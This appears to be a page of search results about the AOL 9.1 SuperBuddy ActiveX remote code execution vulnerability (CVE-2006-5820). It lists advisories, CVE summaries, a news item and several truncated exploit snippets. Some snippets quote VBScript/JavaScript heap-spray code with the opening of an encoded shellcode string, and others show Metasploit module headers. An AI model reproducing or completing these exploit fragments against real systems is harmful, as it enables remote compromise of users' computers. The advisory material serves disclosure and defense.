15 matches found
AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy() remote code execution exploit
!-- AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy remote code execution exploit IE7/heap spray version by nine:situations:group::trotzkista Is possible to execute arbitrary code by setting the first argument to an overlong url and the second argument to a 16 bytes long string which overwrite...
AOL 9.1 SuperBuddy SetSuperBuddy() Code Execution
Set obj = CreateObject"Sb.SuperBuddy.1" shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +...
AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution
AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution Set obj = CreateObject"Sb.SuperBuddy.1" shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...
AOL 9.1 SuperBuddy ActiveX Control remote code execution
No description provided by source. script language=vbscript Set obj = CreateObject"Sb.SuperBuddy.1" /script script language=javascript shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...
AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution
Set obj = CreateObject"Sb.SuperBuddy.1" shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +...
AOL 9.1 SuperBuddy ActiveX Control remote code execution
Exploit for unknown platform in category remote exploits ======================================================== AOL 9.1 SuperBuddy ActiveX Control remote code execution ======================================================== Title: AOL 9.1 SuperBuddy ActiveX Control remote code execution CVE-I...
PBS Website Compromised, Used to Serve Exploits
Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits. According to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe. The malicious...
VulnCheck KEV: CVE-2006-5820
The LinkSBIcons method in the SuperBuddy ActiveX control Sb.SuperBuddy.1 in America Online 9.0 Security Edition dereferences an arbitrary function pointer, which allows remote attackers to execute arbitrary code via a modified pointer value...
AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)
No description provided by source. require 'msf/core' module Msf class Exploits::Windows::Browser::AOLSuperBuddyLinkSBIcons 'AOL Sb.Superbuddy vulnerability', 'Description' = %q This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module. ,...
AOL SuperBuddy ActiveX fails to properly validate method arguments
Overview The AOL SuperBuddy ActiveX control does not properly validate arguments to the LinkSBIcons method. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Description The AOL SuperBuddy ActiveX control Sb.SuperBuddy.1 is a compone...
AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)
AOL SuperBuddy - ActiveX Control Remote Code Execution Metasploit require 'msf/core' module Msf class Exploits::Windows::Browser::AOLSuperBuddyLinkSBIcons 'AOL Sb.Superbuddy vulnerability', 'Description' = %q This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing...
AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)
require 'msf/core' module Msf class Exploits::Windows::Browser::AOLSuperBuddyLinkSBIcons 'AOL Sb.Superbuddy vulnerability', 'Description' = %q This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module. , 'License' = MSFLICENSE, 'Author' = 'kradchad...
CVE-2006-5820
The LinkSBIcons method in the SuperBuddy ActiveX control Sb.SuperBuddy.1 in America Online 9.0 Security Edition dereferences an arbitrary function pointer, which allows remote attackers to execute arbitrary code via a modified pointer value...
CVE-2006-5820
Summary (CVE-2006-5820): AOL's SuperBuddy ActiveX control (Sb.SuperBuddy.1) exposes the LinkSBIcons() method. The vulnerability arises when an attacker-provided address is dereferenced as a function pointer, enabling remote code execution. Impact is remote, unauthenticated, requiring a user to vi...
America Online SuperBuddy ActiveX memory corruption
One of methods allows execute some actions under controllable address...